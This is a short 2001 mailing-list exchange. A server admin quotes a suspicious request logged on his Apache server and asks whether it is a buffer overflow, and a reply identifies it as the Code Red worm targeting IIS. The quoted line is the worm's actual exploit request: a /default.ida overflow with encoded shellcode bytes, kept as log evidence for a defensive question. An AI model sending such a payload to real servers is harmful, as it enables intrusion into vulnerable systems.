Philip S Tellis [Thu, Jul 19, 2001 at 06:47:04PM +0530]:
Somebody's trying to request this: (adjusted to fit the page)
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a
from my web server (Apache 1.3.17)
Does it look like a standard buffer overflow exploit? Doesn't seem to have caused any harm yet, but this has been tried over and over again.
Its the Code Red ida worm. affects IIS and is supposed to DoS www.whitehouse.gov after the 20th of the month. Check the link from /.
Sharukh.